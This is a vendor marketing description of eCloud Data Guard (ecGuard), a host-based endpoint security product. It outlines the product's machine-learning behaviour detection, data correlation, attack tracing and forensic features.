eCloud Data Guard is a new generation of host safeguard system based on behavior analysis to detect advanced threat attacks, which also supports monitoring and auditing of host behavior. It consists of a control center and a lightweight client to help customers provide a comprehensive solution for endpoint security.
Machine Learning Technology
By capturing a large number of static and dynamic user and software behavior eigenvectors of endpoints and adopting the idea of machine learning for training modeling and classification detection of endpoint user and software behavior, ecGuard Machine Learning is mainly applied to the extraction of normal and abnormal behaviors of users and software in this usage scenario, so that a knowledge base of normal and abnormal behavior of users and software in this usage scenario is derived for more efficient detection of endpoint anomalies.
Big Data Correlation Technology
ecGuard collects all kinds of security operation data at all levels and stages of endpoints, and automatically and intelligently correlates and analyzes the massive endpoint security data to trace the attack process and find the source of vulnerabilities and attacks, while appropriately widening the time window and extracting several attributes with intrinsic correlation through wide-time-domain data analysis to identify the time, location, type, intensity and other information of attacks.
Attack Scenario Traceability Technology
Through the formal representation of correlation rules and knowledge, ecGuard Attack Scenario Traceability converts the complicated and disordered security data flow into a structured and easy-to-understand attack scenario to present the scenario diagram reflecting the attack process and intention, identifies the attacker's strategy and purpose and even speculates the missed alarms and predicts the next possible attack behavior to help managers obtain more valuable network security information.
· Behavior Modeling and Detection Algorithm
ecGuard employs a data model of host security behavior that interprets fine-grained and standard generic host events into understandable behavior.
Effective Intelligent Analysis
ecGuard applies behavioral analysis algorithms that continuously adapt to customer business activities to distinguish between normal and malicious behavior. This approach provides higher detection rates and greatly reduces false alarms.
Scenario Forensics and Attack Backtracking Based on Efficient DataRetrieval
ecGuard stores detailed information about each host endpoint, including but not limited to process runs, command line operations, file access, network links, configuration changes, etc. This enables security responders to perform complex queries on large amounts of data and present the easy-to-understand results.
Accurate strike: host-side underlying data monitoring for effectivecountermeasures against various obfuscation techniques, excludinginterference from other systems and networks and reducing false alarms
System stability: focuses on stable system kernel protection toeffectively avoid version adaptation issues caused by operating systempatch upgrades, thus greatly reducing maintenance costs
Real-time protection: instant defense and blocking to protectimportant digital assets in real time
Fast evolution: AI-based evolution of attack behavior patternlearning for fast iteration to support a variety of systems
Accurate traceability: massive information collection and efficientanalysis, providing rich data information for traceability analysis ofsecurity events